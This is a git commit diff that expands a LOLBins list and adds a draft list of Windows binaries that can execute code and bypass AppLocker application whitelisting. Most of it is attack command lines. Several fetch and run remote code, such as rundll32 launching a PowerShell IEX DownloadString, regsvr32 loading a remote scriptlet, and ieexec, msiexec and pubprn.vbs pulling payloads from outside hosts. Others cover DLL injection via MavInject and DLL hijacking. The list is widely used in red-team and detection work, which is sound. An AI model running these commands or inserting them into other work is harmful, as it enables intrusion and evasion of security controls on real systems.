Added some more

LOLBins.md

@@ -7,7 +7,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
    
 ## Rundll32.exe
 
-* Functions: Execute code
+* Functions: Execute
 
 ```
 rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
@@ -19,30 +19,323 @@ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%
 rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
 
 rundll32 shell32.dll,Control_RunDLL payload.dll
+
+rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
+
+rundll32.exe advpack.dll,RegisterOCX calc.exe
+
+rundll32.exe zipfldr.dll,RouteTheCall calc.exe
+
+rundll32.exe url.dll,OpenURL "C:\test\calc.hta"
+
+rundll32.exe url.dll,OpenURL "C:\test\calc.url"
+
+rundll32.exe url.dll, FileProtocolHandler calc.exe
+
+rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"
+
+rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"
+
+rundll32.exe ieadvpack.dll,LaunchINFSection test.inf,,1,
 ```
   
 Acknowledgements:
-* @subtee
-   
+* Casey Smith - @subtee
+* Jimmy - @bohops
+* Moriarty - @Moriarty_Meng
+* Adam - @hexacorn
    
    
 ## Regsvr32.exe
+  
+* Functions: Execute
 
 ```
 regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
 ```
    
 Acknowledgements:
-* @subtee
+* Casey Smith - @subtee
    
    
    
 ## Msbuild.exe
+  
+* Functions: Execute
 
 ```
 msbuild.exe pshell.xml
 ```
+  
+Acknowledgements:
+* Casey Smith - @subtee
+  
+  
+  
+## Regsvcs.exe
+
+* Functions: Execute
+
+```
+regsvcs.exe /U regsvcs.dll
+
+regsvcs.exe regsvcs.dll
+```
+
+Acknowledgements:
+* Casey Smith - @subtee
+  
+  
+  
+## Regasm.exe
+
+* Functions: Execute
+
+```
+regasm.exe /U regsvcs.dll
+
+regasm.exe regsvcs.dll
+```
+
+Acknowledgements:
+* Casey Smith - @subtee
+  
+  
+   
+## InstallUtil.exe
+
+* Functions: Execute
+
+```
+InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
+```
+
+Acknowledgements:
+* Casey Smith - @subtee
+   
+   
+   
+## mshta.exe
+
+* Functions: Execute
+
+```
+mshta.exe evilfile.hta
+```
+
+Acknowledgements:
+* ?   
+   
+   
+   
+## IEExec.exe
+
+* Functions: Execute
+
+```
+ieexec.exe http://x.x.x.x:8080/bypass.exe
+```
+
+Acknowledgements:
+* ?
+  
+  
+  
+## PresentationHost.exe
+
+* Functions: Execute
+
+```
+Presentationhost.exe C:\temp\Evil.xbap
+```
+
+Acknowledgements:
+* Casey Smith - @subtee
+  
+   
+   
+## Msiexec.exe
+
+* Functions: Execute
+
+```
+msiexec /quiet /i cmd.msi
+msiexec /q /i http://192.168.100.3/tmp/cmd.png
+```
+
+Acknowledgements:
+* Casey Smith - @subtee
+  
+  
+  
+## CMSTP.exe
+
+* Functions: Execute
+
+```
+cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
+```
+
+Acknowledgements:
+* Oddvar Moe - @oddvarmoe
+* Nick Tyrer - @NickTyrer
+  
+   
+    
+## Xwizard.exe
+
+* Functions: DLL hijack
+
+```
+xwizard.exe  (xwizard.dll in same folder)
+```
+
+Acknowledgements:
+* Adam - @Hexacorn
+  
+  
+  
+## odbcconf.exe
+
+* Functions: Execute
+
+```
+odbcconf -f file.rsp
+```
 
 Acknowledgements:
 * @subtee
+   
+   
+   
+## Forfiles.exe
+
+* Functions: Execute
+
+```
+forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
+```
+
+Acknowledgements:
+* Eric - @vector_sec
+   
+   
+   
+## SyncAppvPublishingServer.exe
+
+* Functions: Execute
+
+```
+SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX
+```
+
+Acknowledgements:
+* Nick Landers - @monoxgas
+   
+   
+   
+## InfDefaultInstall.exe
+
+* Functions: Execute
+
+```
+InfDefaultInstall.exe shady.inf
+```
+
+Acknowledgements:
+* Kyle Hanslovan - @kylehanslovan
+   
+   
+   
+## Atbroker.exe
+
+* Functions: Execute
+
+```
+ATBroker.exe /start malware
+```
+
+Acknowledgements:
+* Adam - @hexacorn
+   
+   
+   
+## WMIC.exe
+
+* Functions: Execute
+
+```
+wmic process call create calc
+
+wmic process get brief /format:"https://www.example.com/file.xsl
+
+wmic os get /format:"MYXSLFILE.xsl"
+
+wmic process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
+```
+
+Acknowledgements:
+* Casey Smith - @subtee
+   
+   
+   
+## Mavinject32.exe
+
+* Functions: Execute
+
+```
+MavInject32.exe <PID> /INJECTRUNNING <PATH DLL>
+
+MavInject32.exe 3110 /INJECTRUNNING c:\folder\evil.dll>
+```
+
+Acknowledgements:
+* Giuseppe `N3mes1s` - @gN3mes1s
+* Adam - @hexacorn
+   
+   
+   
+## Runscripthelper.exe
+
+* Functions: Execute
+
+```
+runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
+```
+
+Acknowledgements:
+* Matt Graeber - @mattifestation
+   
+   
+   
+## Control.exe
+
+* Functions: Execute
+
+```
+control.exe c:\windows\tasks\file.txt:evil.dll
+
+control.exe 
+(Add registry in HKCU\Software\Microsoft\Windows\currentversion\controlpanel\CPLS to manipulate)
+```
+
+Acknowledgements:
+* Jimmy - @bohops
+   
+   
+   
+## ie4unit.exe
+
+* Functions: Execute
+
+```
+ie4unit.exe -BaseSettings
+(copy out ie4unit.exe and ieuinit.inf - add SCT in the MSIE4RegisterOCX.Windows7 section)
+```
+
+Acknowledgements:
+* Jimmy - @bohops
+
+
+
 

RestList.txt

@@ -0,0 +1,318 @@
+FORMAT:
+
+## Name.exe
+
+* Functions: 
+
+```
+```
+
+Acknowledgements:
+* @subtee
+
+
+
+## MSDT.exe
+
+`Open .diagcab package`
+
+Notes:
+
+* Links:  
+  * https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
+  * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
+
+
+  
+## dfsvc.exe
+
+Missing Example
+
+Notes:
+
+* Links:  
+  * https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
+
+
+
+## 32. Pubprn.vbs
+
+`pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/api0cradle/fb164762143b1ff4042d9c662171a568/raw/709aff66095b7f60e5d6f456a5e42021a95ca802/test.sct`
+
+* Requires admin: No  
+* Windows binary: Yes  
+* Bypasses AppLocker Default rules: ?  
+
+Notes: 
+
+* Links:
+  * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
+  * https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
+   
+   
+   
+## 33. slmgr.vbs
+
+`slmgr.vbs`
+
+* Requires admin: No  
+* Windows binary: Yes  
+* Bypasses AppLocker Default rules: ?  
+
+Notes: Requires registry keys for com object.
+
+* Links:
+  * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
+  * https://www.youtube.com/watch?v=3gz1QmiMhss
+   
+   
+   
+## 34. winrm.vbs
+
+`winrm quickconfig`
+
+* Requires admin: No  
+* Windows binary: Yes  
+* Bypasses AppLocker Default rules: ?  
+
+Notes: Requires registry keys for com object.
+
+* Links:
+  * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
+  * https://www.youtube.com/watch?v=3gz1QmiMhss
+   
+   
+
+
+   
+   
+   
+## 43. CL_Invocation.ps1
+
+`. C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1`
+`SyncInvoke <executable> [args]`
+
+* Requires admin: No  
+* Windows binary: Yes  
+* Bypasses AppLocker Default rules: Yes, as long as PowerShell version 2 is present  
+
+Notes:
+Requires PowerShell version 2
+
+* Links:
+  * https://twitter.com/bohops/status/948548812561436672
+   
+   
+
+* Requires admin: No  
+* Windows binary: Yes  
+* Bypasses AppLocker Default rules: ?
+
+Notes:
+Requires write access to a place that is allowed by AppLocker
+
+* Links:
+  * https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/   
+  * https://twitter.com/bohops/status/955659561008017409   
+
+ 
+
+## 55. Visual Studio Tools for Office - .VSTO files
+
+```
+evilfile.vsto
+```
+
+* Requires admin: No
+* Windows binary: Yes
+* Bypasses AppLocker Default rules: ?
+
+Notes:
+You need to build a solution using Visual Studio Tools for Office. 
+User needs to confirm installation after executing. 
+
+* Links:
+  * https://bohops.com/2018/01/31/vsto-the-payload-installer-that-probably-defeats-your-application-whitelisting-rules/
+  
+  
+  
+  
+## 56. Manage-bde.wsf
+
+```
+cscript c:\windows\system32\manage-bde.wsf
+```
+
+* Requires admin: No
+* Windows binary: Yes
+* Bypasses AppLocker Default rules: ?
+
+Notes:
+Need to adjust comspec variable using: set comspec=c:\windows\system32\calc.exe
+
+* Links:
+  * https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712
+  * https://twitter.com/bohops/status/980659399495741441
+
+  
+# OTHER MICROSOFT SIGNED BINARIES
+  
+## Bginfo.exe
+
+`bginfo.exe bginfo.bgi /popup /nolicprompt`
+
+* Requires admin: No  
+* Windows binary: No  
+* Bypasses AppLocker Default rules: No  
+
+Notes:
+Will work if BGinfo.exe is located in a path that is trusted by the policy.
+
+* Links:  
+  * https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
+  * https://oddvar.moe/2017/05/22/clarification-bginfo-4-22-applocker-still-vulnerable/
+  * https://pentestlab.blog/2017/06/05/applocker-bypass-bginfo/
+
+
+
+
+## 21. msxsl.exe
+
+`msxsl.exe customers.xml script.xsl`
+
+* Requires admin: No  
+* Windows binary: No  
+* Bypasses AppLocker Default rules: ?  
+
+Notes:
+
+* Links:  
+  * https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
+  * https://gist.github.com/subTee/d9380299ff35738723cb44f230ab39a1
+  * https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker
+  * https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
+
+## 38. Winword.exe
+
+`winword.exe /l dllfile.dll`
+
+* Requires admin: No  
+* Windows binary: Yes  
+* Bypasses AppLocker Default rules: ?  
+
+Notes: No commonly made DLL example file
+
+* Links:
+  * https://twitter.com/subTee/status/884615369511636992
+   
+
+## 17. dnx.exe
+
+`dnx.exe consoleapp`
+
+* Requires admin: ?  
+* Windows binary: No  
+* Bypasses AppLocker Default rules: ?  
+
+Notes:
+
+* Links:  
+  * https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
+   
+
+## cdb.exe
+
+`cdb.exe -cf x64_calc.wds -o notepad.exe`
+
+* Requires admin: ?  
+* Windows binary: No  
+* Bypasses AppLocker Default rules: ?  
+
+Notes:
+
+* Links:  
+  * http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
+
+
+
+## 18. rcsi.exe
+
+`rcsi.exe bypass.csx`
+
+* Requires admin: ?  
+* Windows binary: No  
+* Bypasses AppLocker Default rules: ?  
+
+Notes:
+
+* Links:  
+  * https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/
+
+
+
+## 19. csi.exe
+
+Missing example
+
+* Requires admin: ?  
+* Windows binary: No  
+* Bypasses AppLocker Default rules: ?  
+
+Notes:
+
+* Links:  
+  * https://web.archive.org/web/20161008143428/   
+  * http://subt0x10.blogspot.com/2016/09/application-whitelisting-bypass-csiexe.html
+
+
+
+## 27. te.exe
+
+`te.exe bypass.wsc`
+
+* Requires admin: No  
+* Windows binary: No  
+* Bypasses AppLocker Default rules: ?  
+
+Notes: Can be used if the Test Authoring and Execution Framework is installed and is in a path that is whitelisted. 
+Default location is: C:\program files (x86)\Windows Kits\10\testing\Runtimes\TAEF
+ 
+* Links:
+  * https://twitter.com/gN3mes1s/status/927680266390384640
+  * https://gist.github.com/N3mes1s/5b75a4cd6aa4d41bb742acace2c8ab42
+
+
+## 25. fsi.exe
+
+`fsi.exe c:\folder\d.fscript`
+
+* Requires admin: No  
+* Windows binary: No  
+* Bypasses AppLocker Default rules: ?  
+
+Notes:
+
+* Links:
+  * https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1  
+  * https://twitter.com/NickTyrer/status/904273264385589248  
+  * https://docs.microsoft.com/en-us/dotnet/fsharp/tutorials/fsharp-interactive/  
+
+  
+## 40. Tracker.exe
+
+`Tracker.exe /d .\calc.dll /c C:\Windows\write.exe`
+
+* Requires admin: No  
+* Windows binary: No  
+* Bypasses AppLocker Default rules: ?  
+
+Notes:
+Part of Visual studio. 
+Requires TrackerUI.dll present in 1028 subfolder.
+
+* Links:
+  * https://twitter.com/Sudhanshu_C/status/943011972261412864
+   
+   
+
+# OTHER NON-MICROSOFT BINARIES